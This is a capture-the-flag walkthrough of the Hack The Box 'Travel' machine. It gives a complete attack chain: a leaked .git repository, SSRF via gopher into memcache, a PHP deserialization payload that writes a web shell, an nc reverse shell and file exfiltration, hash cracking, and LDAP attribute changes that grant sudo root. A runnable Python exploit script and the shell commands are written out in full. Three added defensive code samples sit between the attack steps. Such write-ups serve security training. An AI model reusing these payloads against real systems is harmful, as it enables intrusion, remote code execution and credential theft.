NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 19:52 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:52
Completed NSE at 19:52, 0.00s elapsed
Initiating NSE at 19:52
Completed NSE at 19:52, 0.00s elapsed
Initiating NSE at 19:52
Completed NSE at 19:52, 0.00s elapsed
Initiating Ping Scan at 19:52
Scanning 10.10.10.189 [4 ports]
Completed Ping Scan at 19:52, 0.65s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:52
Scanning ldap.travel.htb (10.10.10.189) [1000 ports]
Discovered open port 22/tcp on 10.10.10.189
Discovered open port 80/tcp on 10.10.10.189
Discovered open port 443/tcp on 10.10.10.189
Completed SYN Stealth Scan at 19:52, 3.76s elapsed (1000 total ports)
Initiating Service scan at 19:52
Scanning 3 services on ldap.travel.htb (10.10.10.189)
Completed Service scan at 19:52, 14.28s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #2) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #3) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #4) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #5) against ldap.travel.htb (10.10.10.189)
Initiating Traceroute at 19:52
Completed Traceroute at 19:52, 0.56s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:52
Completed Parallel DNS resolution of 2 hosts. at 19:52, 0.61s elapsed
NSE: Script scanning 10.10.10.189.
Initiating NSE at 19:52
Completed NSE at 19:53, 14.29s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 3.08s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for ldap.travel.htb (10.10.10.189)
Host is up (0.30s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.17.6
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB
443/tcp open  ssl/http nginx 1.17.6
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB - SSL coming soon.
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Issuer: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-23T19:24:29
| Not valid after:  2030-04-21T19:24:29
| MD5:   ef0a a4c1 fbad 1ac4 d160 58e3 beac 9698
|_SHA-1: 0170 7c30 db3e 2a93 cda7 7bbe 8a8b 7777 5bcd 0498
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/5%OT=22%CT=1%CU=35636%PV=Y%DS=2%DC=T%G=Y%TM=5F01E24C
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F5%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=A)ECN(R
OS:=N)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Uptime guess: 34.417 days (since Mon Jun  1 09:52:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=245 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   555.47 ms 10.10.14.1
2   555.59 ms ldap.travel.htb (10.10.10.189)

NSE: Script Post-scanning.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.62 seconds
           Raw packets sent: 1305 (64.070KB) | Rcvd: 1185 (50.866KB)
ENUMERATION
From the nmap scan (the certificate's Subject Alternative Name) we know that there are 2 other domains besides travel.htb:
- travel.htb
- blog.travel.htb
- blog-dev.travel.htb
First, add these domains to /etc/hosts.
TRAVEL.HTB
BLOG.TRAVEL.HTB
BLOG-DEV.TRAVEL.HTB
I fuzzed every domain, but the interesting results came from blog-dev.travel.htb:
┌─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #wfuzz -u http://blog-dev.travel.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt --hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://blog-dev.travel.htb/FUZZ
Total requests: 4614

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000001:   403        7 L      9 W      154 Ch      ""
000000009:   200        1 L      2 W      23 Ch       ".git/HEAD"
000000090:   404        7 L      11 W     154 Ch      "_tmp"
^C
Finishing pending requests...
So we know that we have to pull the repository through the exposed .git directory to get all the files.
I used a tool here, gitdumper: LINK
┌─[root@liquid]─[~/Desktop/HTB/travelC/GitTools/Dumper]
└──╼ #./gitdumper.sh http://blog-dev.travel.htb/.git/ ../../blog.travel.htb
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########

[*] Destination folder does not exist
[+] Creating ../../blog.travel.htb/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/03/13850ae948d71767aff2cc8cc0f87a0feeef63
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/b0/2b083f68102c4d62c49ed3c99ccbb31632ae9f
[+] Downloaded: objects/ed/116c7c7c51645f1e8a403bcec44873f74208e9
[+] Downloaded: objects/2b/1869f5a2d50f0ede787af91b3ff376efb7b039
[+] Downloaded: objects/30/b6f36ec80e8bc96451e47c49597fdd64cee2da
┌─[root@liquid]─[~/Desktop/HTB/travelC/GitTools/Dumper]
└──╼ #cd ../../
Here we have downloaded every file from the .git directory:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb/.git]
└──╼ #cat index
(binary git index; the readable entries name README.md, rss_template.php and template.php)
It looks like some files have been deleted from the working tree and need to be recovered.
A single git command does that:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
└──╼ #git restore .
┌─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
└──╼ #ls
README.md  rss_template.php  template.php
Here are the 2 files we need to analyse:
Things we learned from these files:
Memcache is in use as the SimplePie cache backend (local, port 11211, key prefix xct_):
$simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');
There is a function that fetches a user-supplied URL with curl on the server side (the SSRF sink):
function url_get_contents ($url) {
    $url = safe($url);               // safe() rejects the plain localhost address (see below)
    $url = escapeshellarg($url);
    $pl = "curl ".$url;              // server-side fetch of a user-controlled URL
    $output = shell_exec($pl);
    return $output;
}
There is a class that writes its data property into a logs directory, and this looks like a PHP deserialization target:
private function init(string $file, string $data) {
    $this->file = $file;
    $this->data = $data;
    // writes the object's data property to logs/<file>
    file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
}
}
This is where the custom_feed_url GET parameter is handled:
$url = $_SERVER['QUERY_STRING'];
if(strpos($url, "custom_feed_url") !== false){
    $tmp = (explode("=", $url));
So we know that the value of the custom_feed_url parameter is fetched server-side (SSRF), which could help get us a shell.
So when we visit this URL:
http://blog.travel.htb/awesome-rss/?custom_feed_url=10.10.14.12
we get a request back in this format:
┌─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
└──╼ #python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.189 - - [05/Jul/2020 22:03:03] "GET / HTTP/1.1" 200 -
10.10.10.189 - - [05/Jul/2020 22:03:04] "GET /? HTTP/1.1" 200 -
Now we need to chain memcache, PHP deserialization and the SSRF to get a reverse shell.
For that there is a tool called Gopherus, which builds gopher:// payloads.
WHAT WE ARE GOING TO DO TO GET REV SHELL:
We will generate a payload with Gopherus through which we can execute commands, then trigger that payload via the URL parameter above. After that we go to the file where our payload was written and execute shell commands.
First we try Gopherus without a real payload. Remember to change 127.0.0.1 to 127.00.0.1, because plain localhost gives an error, as we saw in the template file above.
┌─[root@liquid]─[~/Desktop/HTB/travelC/Gopherus]
└──╼ #python gopherus.py --exploit phpmemcache

(Gopherus ASCII-art banner)
  author: $_SpyD3r_$

This is usable when you know Class and Variable name used by user

Give serialization payload
example: O:5:"Hello":0:{}  : O:5:"Hello":0:{}

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%2016%0d%0aO:5:%22Hello%22:0:%7B%7D%0d%0a

After everything done, you can delete memcached item by using this payload:

gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a

-----------Made-by-SpyD3r-----------
Here we can see that we have successfully echoed Hello on the page.
Now we need to generate a payload which stores a PHP script that executes commands in a file, and saves that file in the logs directory.
To do that we use a payload which looks like this:
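Added example, not code from the walkthrough or from the theme: the check a defender would put in front of a fetcher like url_get_contents. It rejects non-HTTP schemes and CRLF, and resolves the host before judging it, so a spelling such as 127.00.0.1 that slips past a string match on 127.0.0.1 is still caught. The dns_lookup hook is an assumption made so the function can be tested offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def host_to_ips(host, dns_lookup=None):
    """Addresses a fetcher like curl would actually connect to for `host`.

    Numeric hosts go through inet_aton, which (like libc resolvers) accepts
    spellings such as 127.00.0.1, 0177.0.0.1 or 0x7f.1, so the check sees the
    real address rather than the string the user typed. Names are resolved
    with dns_lookup (defaults to getaddrinfo; injectable for offline tests).
    """
    try:
        packed = socket.inet_aton(host)          # libc parsing quirks included
        return [ipaddress.ip_address(socket.inet_ntoa(packed))]
    except OSError:
        pass
    try:
        return [ipaddress.ip_address(host)]      # IPv6 literal such as ::1
    except ValueError:
        pass
    if dns_lookup is None:
        dns_lookup = lambda h: [ai[4][0] for ai in socket.getaddrinfo(h, None)]
    return [ipaddress.ip_address(ip) for ip in dns_lookup(host)]


def check_feed_url(raw_url, dns_lookup=None):
    """Return (allowed, reason) for a user-supplied feed URL."""
    lowered = raw_url.lower()
    if "\r" in raw_url or "\n" in raw_url or "%0d" in lowered or "%0a" in lowered:
        return False, "CRLF in URL (protocol smuggling)"
    parts = urlsplit(raw_url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return False, "no host"
    try:
        ips = host_to_ips(parts.hostname, dns_lookup)
    except (OSError, ValueError):
        return False, "host does not resolve"
    for ip in ips:
        if not ip.is_global:                     # loopback, RFC1918, link-local, ...
            return False, "host resolves to non-public address %s" % ip
    return True, "ok"
```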
O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}
This payload stores a PHP script in the given file. Here the file is named liquid.php, with a php extension.
But Gopherus puts its own key (SpyD3r) into its payload, whereas we need xct_4e5612ba079c530a6b1f148c0b352241 there, so we write a script like this.
Whole payload looks like this :
CODE :
'O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}'
Here we add the xct part in front of this code:
payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
Here we URL-encode this code:
encodedpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
Here we add the gopher URL in front of the encoded payload:
return "gopher://127.00.0.1:11211/" + encodedpayload
So the whole script is this:
import requests
import urllib.parse

LHOST = "10.10.14.12"
file = "liquid.php"                 # name of the file written under logs/
url = "http://blog.travel.htb/"


def build_payload():
    # serialized TemplateHelper object: its init() writes "data" to logs/<file>
    code = 'O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}'
    # memcache key: md5(md5("http://www.travel.htb/newsfeed/customfeed.xml"):"spc") = 4e5612ba079c530a6b1f148c0b352241
    payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
    # URL-encode for gopher but keep the %0d%0a sequences, ":" and "/" as they are
    encodedpayload = urllib.parse.quote_plus(payload).replace("+", "%20").replace("%2F", "/").replace("%25", "%").replace("%3A", ":")
    # 127.00.0.1 instead of 127.0.0.1: safe() in template.php rejects the plain localhost string
    return "gopher://127.00.0.1:11211/" + encodedpayload


payload = build_payload()
print("[+] payload is: " + payload)
print("[+] Requesting using SSRF in phpmemcache")
ssrf_url = url + "awesome-rss/?debug=yes&custom_feed_url=" + payload
print(ssrf_url)
r = requests.get(ssrf_url)            # server-side curl pushes the object into memcache
print("[+] Its time for deserialization")
r = requests.get(url + "awesome-rss/")  # the page reads the cache entry back and unserializes it
payload_url = url + "wp-content/themes/twentytwenty/logs/" + file
while True:                           # poll until the written file is reachable
    print(payload_url)
    r = requests.get(payload_url)
    print(r.status_code)
    if r.status_code == 200:
        break
print("[+] You are ready to go")
print("[+] Run commands on web shell now")
After running this script, just go to the given URL to execute commands:
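Added example, not part of the walkthrough: detection logic over constructed nginx access-log lines that flags the two observable steps of this chain, a custom_feed_url pointing at a non-HTTP scheme or carrying CRLF, and a PHP file being served from a theme's logs/ directory. The log lines and the regexes are constructed for this example; only the paths and addresses come from the walkthrough.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed nginx "combined" log lines modelled on the traffic this chain
# produces; addresses and paths are the ones used in the walkthrough.
SAMPLE_LOG = """\
10.10.14.12 - - [05/Jul/2020:22:03:03 +0000] "GET /awesome-rss/?custom_feed_url=http://10.10.14.12/feed.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.12 - - [05/Jul/2020:22:10:41 +0000] "GET /awesome-rss/?debug=yes&custom_feed_url=gopher://127.00.0.1:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%2088%0d%0a HTTP/1.1" 200 5120 "-" "python-requests/2.23.0"
10.10.14.12 - - [05/Jul/2020:22:10:42 +0000] "GET /awesome-rss/ HTTP/1.1" 200 5120 "-" "python-requests/2.23.0"
10.10.14.12 - - [05/Jul/2020:22:10:43 +0000] "GET /wp-content/themes/twentytwenty/logs/liquid.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
10.10.14.12 - - [05/Jul/2020:22:11:00 +0000] "GET /wp-content/themes/twentytwenty/style.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
THEME_LOGS_PHP = re.compile(r"^/wp-content/themes/[^/]+/logs/[^/]+\.php$", re.I)


def inspect_request(path):
    """Return the reasons a single request path looks like this attack chain."""
    reasons = []
    parts = urlsplit(path)
    for feed in parse_qs(parts.query).get("custom_feed_url", []):
        decoded = unquote(feed)                 # parse_qs already decoded once; be thorough
        scheme = urlsplit(decoded).scheme.lower()
        if scheme and scheme not in ("http", "https"):
            reasons.append("custom_feed_url uses %s:// (SSRF to a non-HTTP service)" % scheme)
        if "\r\n" in decoded:
            reasons.append("custom_feed_url carries CRLF (memcached command smuggling)")
    if THEME_LOGS_PHP.match(parts.path):
        reasons.append("PHP file served from a theme logs/ directory (dropped web shell)")
    return reasons


def scan_log(text):
    """Return (client_ip, timestamp, reasons) for each suspicious combined-format line."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                            # not a combined-format line; skip
        reasons = inspect_request(m.group("path"))
        if reasons:
            hits.append((m.group("ip"), m.group("ts"), reasons))
    return hits
```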
GETTING LOW PRIV SHELL
So after executing a simple command: nc 10.10.14.12 9001 -e /bin/bash
you will get a shell like this:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.189] 57608
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html/wp-content/themes/twentytwenty/logs
Here we have a file in the /opt/wordpress/ folder which looks suspicious.
Transfer that file to your own machine.
VICTIMS MACHINE
backup-13-04-2020.sql
nc 10.10.14.12 9003 < backup-13-04-2020.sql
ATTACKERS MACHINE
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #nc -lnvp 9003 > backup-13-04-2020.sql
listening on [any] 9003 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.189] 40198
Checking this dump, I found 2 hashes in its last lines, which I put in hashes.txt and ran against hashcat:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #hashcat -m 400 -a 0 hash ../../THM/Wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

<---->

$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: hash
Time.Started.....: Sun Jul  5 20:58:28 2020 (1 hour, 0 mins)
Time.Estimated...: Sun Jul  5 21:58:44 2020 (0 secs)
Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     4170 H/s (4.98ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 28688768/28688768 (100.00%)
Rejected.........: 0/28688768 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:8064-8192
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]

Started: Sun Jul  5 20:58:24 2020
Stopped: Sun Jul  5 21:58:44 2020
lynik-admin : 1stepcloser
SSH LOGIN
┌─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #ssh lynik-admin@10.10.10.189
lynik-admin@10.10.10.189's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

  System information as of Sun 05 Jul 2020 05:12:38 PM UTC

  System load:  0.01
  Usage of /:   46.5% of 15.68GB
  Memory usage: 12%
  Swap usage:   0%
  Processes:    203
  Users logged in: 0
  IPv4 address for br-836575a2ebbb: 172.20.0.1
  IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0: 10.10.10.189

Last login: Sun Jul 5 15:35:41 2020 from 10.10.14.12
lynik-admin@travel:~$ id
uid=1001(lynik-admin) gid=1001(lynik-admin) groups=1001(lynik-admin)
lynik-admin@travel:~$ ls
user.txt
lynik-admin@travel:~$ cat user.txt
0b08xxxxxxxxxxxxxxxxxxxx5292af9
lynik-admin@travel:~$
Here we go with the user flag.
After enumerating I saw files mainly related to LDAP, so I enumerated LDAP further and found these files:
-rw-r--r-- 1 lynik-admin lynik-admin 82 Apr 23 19:35 .ldaprc
-rw------- 1 lynik-admin lynik-admin 861 Apr 23 19:35 .viminfo
In these files I got the BINDPW: Theroadlesstraveled
So I ran this command to get the users on the LDAP server:
ldapsearch -x -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled
So here I know that I am the LDAP admin, so I can add and modify users in LDAP.
So just create a small LDIF file with the modifications for the user, giving it access equal to root:
liquid.ldif
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa <your public key> root@liquid
-
replace: userPassword
userPassword: liquid
-
replace: gidNumber
gidNumber: 27
Here we change user johnny's access from low to root by setting:
- HOME (to give access to everything root has access to)
- GID 27 (to put this user in the sudo group)
- USERPASSWORD (to change the user's password)
- SSHPUBLICKEY (to add an SSH public key so we can authenticate with our private key)
You have to generate an SSH key pair on your own machine (without a passphrase, for simplicity) and use the public key in the LDIF above.
Now let's run this command:
lynik-admin@travel:~$ ldapmodify -x -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f liquid.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

lynik-admin@travel:~$
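Added example, not part of the walkthrough: a reviewer for LDIF modify records (the form an LDAP audit log or a change request carries) that flags attribute changes which widen shell access on LDAP-bound Linux hosts. The risky-attribute list and the sample LDIF (the johnny change above, with a placeholder key) are assumptions made for this example.

```python
import re
RISKY_ATTRS = {  # assumed for this example; the johnny change above hits all five
    "gidnumber": lambda v: v in ("0", "27"),                 # root or sudo group
    "homedirectory": lambda v: v == "/root" or v.startswith("/root/"),
    "sshpublickey": lambda v: True, "userpassword": lambda v: True,
    "objectclass": lambda v: v.lower() == "ldappublickey"}
# Constructed sample: the walkthrough's liquid.ldif with a placeholder key.
SAMPLE_LDIF = """\
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAA<placeholder-key> root@liquid
-
replace: userPassword
userPassword: liquid
-
replace: gidNumber
gidNumber: 27
"""

def parse_ldif_modify(text):
    """Parse 'changetype: modify' records into [(dn, [(op, attr, [values]), ...])]."""
    text = re.sub(r"\n ", "", text)            # unfold continuation lines
    records, dn, changes, cur = [], None, [], None
    for line in text.split("\n") + [""]:       # trailing "" flushes the last record
        line = line.rstrip()
        if not line or line == "-":            # both end the current attribute block
            if cur:
                changes.append(cur)
            cur = None
            if not line and dn is not None:    # a blank line also ends the record
                records.append((dn, changes))
                dn, changes = None, []
        else:
            attr, _, value = line.partition(":")
            attr, value = attr.lower(), value.strip()
            if attr == "dn":
                dn = value
            elif attr in ("add", "replace", "delete"):
                cur = (attr, value.lower(), [])
            elif cur is not None:              # value line of the current block
                cur[2].append(value)
    return records

def risky_changes(ldif_text):
    """(dn, op, attr) for every add/replace whose values hit a RISKY_ATTRS rule."""
    return [(dn, op, attr) for dn, changes in parse_ldif_modify(ldif_text)
            for op, attr, values in changes
            if op != "delete" and attr in RISKY_ATTRS
            and any(RISKY_ATTRS[attr](v) for v in values)]
```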
After that, run these commands on your machine:
┌─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #chmod 600 id_rsa
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #ssh -i id_rsa johnny@10.10.10.189
Creating directory '/home@TRAVEL/johnny'.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

  System information as of Sun 05 Jul 2020 05:24:46 PM UTC

  System load:  0.0
  Usage of /:   46.5% of 15.68GB
  Memory usage: 13%
  Swap usage:   0%
  Processes:    205
  Users logged in: 1
  IPv4 address for br-836575a2ebbb: 172.20.0.1
  IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0: 10.10.10.189

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sun Jul 5 16:05:06 2020 from 10.10.14.12

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

johnny@travel:~$ sudo whoami
[sudo] password for johnny:
root
johnny@travel:~$ sudo cat /root/root.txt
81abxxxxxxxxxxxxxxxxxxxx6c3c8
johnny@travel:~$
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE